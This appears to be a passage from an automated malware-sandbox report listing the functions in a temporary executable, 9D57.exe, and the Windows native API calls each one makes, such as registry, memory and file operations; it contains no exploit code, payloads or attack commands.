Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 23_2_6D304496
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A480 ZwInitializeNlsFiles, 23_2_6D28A480
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 23_2_6D2C3C93
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 23_2_6D24EC9B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 23_2_6D24F4E3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1CE4 ZwQueryInformationProcess, 23_2_6D2D1CE4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3014FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D3014FB
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 23_2_6D2F64FB
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318CD6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 23_2_6D27CCC0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A4C0 ZwIsUILanguageComitted, 23_2_6D28A4C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242CDB RtlFreeHeap,ZwClose,ZwSetEvent, 23_2_6D242CDB
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap, 23_2_6D27E730
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289730 ZwQueryVirtualMemory, 23_2_6D289730
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FCF30 ZwAlertThreadByThreadId, 23_2_6D2FCF30
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D279702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 23_2_6D279702
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289710 ZwQueryInformationToken, 23_2_6D289710
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D6715 memset,memcpy,ZwTraceEvent, 23_2_6D2D6715
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 23_2_6D2D176C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D246F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 23_2_6D246F60
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AF60 ZwSetTimer2, 23_2_6D28AF60
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 23_2_6D27CF6A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289F70 ZwCreateIoCompletion, 23_2_6D289F70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289770 ZwSetInformationFile, 23_2_6D289770
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318F6A
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 23_2_6D2FCF70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D280F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 23_2_6D280F48
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289740 ZwOpenThreadToken, 23_2_6D289740
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2CA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 23_2_6D2CA746
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 23_2_6D27174B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 23_2_6D2D5F5F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289750 ZwQueryInformationThread, 23_2_6D289750
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2CA7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 23_2_6D2CA7AC
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2897A0 ZwUnmapViewOfSection, 23_2_6D2897A0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D283FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,ZwUnmapViewOfSection, 23_2_6D283FA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D242FB0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F5F87 ZwUnmapViewOfSection, 23_2_6D2F5F87
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D5780 DbgPrompt,ZwWow64DebuggerCall, 23_2_6D2D5780
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 23_2_6D27FF9C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D0FEC ZwDuplicateObject,ZwDuplicateObject, 23_2_6D2D0FEC
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2737EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 23_2_6D2737EB
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D250FFD RtlInitUnicodeString,ZwQueryValueKey, 23_2_6D250FFD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 23_2_6D24F7C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2897C0 ZwTerminateProcess, 23_2_6D2897C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 23_2_6D27D7CA
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27DFDF ZwAlertThreadByThreadId, 23_2_6D27DFDF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AFD0 ZwShutdownWorkerFactory, 23_2_6D28AFD0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E620 memset,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,RtlInitUnicodeString,RtlCultureNameToLCID,RtlInitUnicodeString,RtlCultureNameToLCID, 23_2_6D24E620
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289E20 ZwCancelTimer2, 23_2_6D289E20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D2FFE3F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D313E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 23_2_6D313E22
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B630 ZwWaitForKeyedEvent, 23_2_6D24B630
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289E30 ZwCancelWaitCompletionPacket, 23_2_6D289E30
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 23_2_6D24C600
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D282E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 23_2_6D282E1C
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289610 ZwEnumerateValueKey, 23_2_6D289610
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D2D2E14
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction, 23_2_6D27BE62
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28AE70 ZwSetInformationWorkerFactory, 23_2_6D28AE70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289670 ZwQueryInformationProcess, 23_2_6D289670
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 23_2_6D28B640
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 23_2_6D28B650
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289650 ZwQueryValueKey, 23_2_6D289650
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 23_2_6D2D6652
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289EA0 ZwCompareSigningLevels, 23_2_6D289EA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D313EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 23_2_6D313EBC
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D2D2EA3
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread, 23_2_6D26E6B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D243E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D243E80
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 23_2_6D2FBE9B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A690 ZwOpenKeyEx, 23_2_6D28A690
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 23_2_6D27DE9E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242E9F ZwCreateEvent,ZwClose, 23_2_6D242E9F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2896E0 ZwFreeVirtualMemory, 23_2_6D2896E0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 23_2_6D24B6F0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 23_2_6D2D16FA
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D29DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 23_2_6D29DEF0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2576FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 23_2_6D2576FE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26E6F9 ZwAlpcSetInformation, 23_2_6D26E6F9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318ED6
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2896C0 ZwSetInformationProcess, 23_2_6D2896C0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2466D4 RtlInitUnicodeString,ZwQueryValueKey, 23_2_6D2466D4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D279ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 23_2_6D279ED0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2896D0 ZwCreateKey, 23_2_6D2896D0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D242ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 23_2_6D242ED8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D264120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 23_2_6D264120
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289920 ZwDuplicateToken, 23_2_6D289920
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D31F13B ZwOpenKey,ZwCreateKey, 23_2_6D31F13B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D193B ZwRaiseException,ZwTerminateProcess, 23_2_6D2D193B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A130 ZwCreateWaitCompletionPacket, 23_2_6D28A130
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D249100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,RtlDebugPrintTimes, 23_2_6D249100
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D250100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 23_2_6D250100
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289900 ZwOpenEvent, 23_2_6D289900
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2E5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,ZwTerminateProcess, 23_2_6D2E5100
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289910 ZwAdjustPrivilegesToken, 23_2_6D289910
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B160 ZwUpdateWnfStateData, 23_2_6D28B160
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A160 ZwCreateWorkerFactory, 23_2_6D28A160
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27D976 ZwCreateFile,ZwCreateFile, 23_2_6D27D976
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 23_2_6D24B171
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D318966
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1976 ZwCreateEvent, 23_2_6D2D1976
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3971 ZwOpenKeyEx, 23_2_6D2C3971
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 23_2_6D26B944
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlInitUnicodeString,ZwOpenKey, 23_2_6D24F150
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B150 ZwUnsubscribeWnfStateChange, 23_2_6D28B150
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 23_2_6D24395E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D31F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 23_2_6D31F1B5
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B1A0 ZwWaitForKeyedEvent, 23_2_6D28B1A0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 23_2_6D2C51BE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3049A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 23_2_6D3049A4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2549B0 RtlpGetSystemDefaultUILanguage,RtlpCreateProcessRegistryInfo,ZwQueryInstallUILanguage,ZwIsUILanguageComitted, 23_2_6D2549B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A9B0 ZwQueryLicenseValue, 23_2_6D28A9B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 23_2_6D27C9BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 23_2_6D26C182
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B180 ZwWaitForAlertByThreadId, 23_2_6D28B180
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289980 ZwCreateEvent, 23_2_6D289980
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A980 ZwQueryInstallUILanguage, 23_2_6D28A980
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 23_2_6D2F6186
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289990 ZwQueryVolumeInformationFile, 23_2_6D289990
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D30A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 23_2_6D30A189
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 23_2_6D24519E
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F1E4 ZwEnumerateValueKey, 23_2_6D24F1E4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E9ED RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlFreeHeap, 23_2_6D24E9ED
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3189E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 23_2_6D3189E7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 23_2_6D2D19C8
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D274020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask, 23_2_6D274020
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289830 ZwOpenFile, 23_2_6D289830
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D31F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 23_2_6D31F019
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24E009 memset,ZwIsUILanguageComitted,RtlpGetNameFromLangInfoNode,ZwQueryInstallUILanguage,RtlLCIDToCultureName,RtlFreeHeap, 23_2_6D24E009
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 23_2_6D24F018
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25106F ZwOpenKey,ZwClose, 23_2_6D25106F
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2D1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 23_2_6D2D1879
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289840 ZwDelayExecution, 23_2_6D289840
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318858 ZwAlertThreadByThreadId, 23_2_6D318858
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap, 23_2_6D245050
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289850 ZwQueryDirectoryFile, 23_2_6D289850
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26F0AE ZwSetInformationWorkerFactory, 23_2_6D26F0AE
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F60A2 ZwQueryInformationFile, 23_2_6D2F60A2
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28B0B0 ZwTraceControl, 23_2_6D28B0B0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 23_2_6D27F0BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2718B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 23_2_6D2718B9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28108B ZwClose, 23_2_6D28108B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D243880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 23_2_6D243880
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,ZwClose, 23_2_6D27A080
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2C3884 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap, 23_2_6D2C3884
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 23_2_6D26E090
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D28A890 ZwQueryDebugFilterState, 23_2_6D28A890
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D289890 ZwFsControlFile, 23_2_6D289890
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2F60E9 ZwOpenKey,ZwClose,ZwClose, 23_2_6D2F60E9
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FE0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 23_2_6D2FE0E9
